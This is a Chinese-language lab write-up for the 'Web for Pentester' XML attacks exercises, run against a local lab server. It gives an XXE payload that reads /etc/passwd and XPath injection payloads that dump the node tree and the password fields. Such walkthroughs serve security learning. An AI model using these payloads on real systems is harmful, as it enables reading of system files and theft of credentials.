Web for pentester_writeup之XML attacks篇

XML attacks（XML攻击）

Example 1 - XML外部实体注入(XXE)

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181259909-649426507.png)

Payload
http://192.168.219.136/xml/example1.php?xml= <!DOCTYPE a[<!ENTITY b SYSTEM "file:///etc/passwd">]><c>%26b;</c>

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181311103-20902236.png)

Example 2 - Xpath注入

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181319011-891038369.png) 输入一个单引号，报错，分析报错信息发现xpath函数，猜测是xpath注入 <1> `http://192.168.219.136/xml/example2.php?name=hacker' and '1' ='1` ![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181324774-2007834750.png)

<2> http://192.168.219.136/xml/example2.php?name=hacker' and '1' ='2

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181330451-1657338604.png)

<3> http://192.168.219.136/xml/example2.php?name=hacker' or '1' ='1

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181337206-2047698607.png)

<4> http://192.168.219.136/xml/example2.php?name=hacker' or '1' ='2

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181441610-362099624.png)

可知XPath的代码为 [PARENT NODES]/name[.='[INPUT]']/[CHILD NODES]

Payload
http://192.168.219.136/xml/example2.php?name=' or 1=1]/parent::*/child::node()%00

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181446807-1802045137.png)

http://192.168.219.136/xml/example2.php?name=hacker' or 1=1]/parent::*/password%00

![](https://img2018.cnblogs.com/blog/1605154/201908/1605154-20190808181450842-1008994050.png)

相关阅读:
【Codeforces】【161Div2】
【ZOJ月赛】【树形DP】【I.Destroy】
【Baltic 2001远程通信】
【树形DP】【分组背包】【HDU1561】
【差分约束系统】【仍未AC】【Asia Harbin 2010/2011】【THE MATRIX PROBLEM】
【DP】【2012 ACM/ICPC 成都赛区现场赛】【I.Count】
【ZOJ月赛】【二分查找】【A.Edward's Cola Plan】
【DP】【单调队列多重背包】
【树形依赖背包】
SQL 格式

原文地址：https://www.cnblogs.com/liliyuanshangcao/p/11322907.html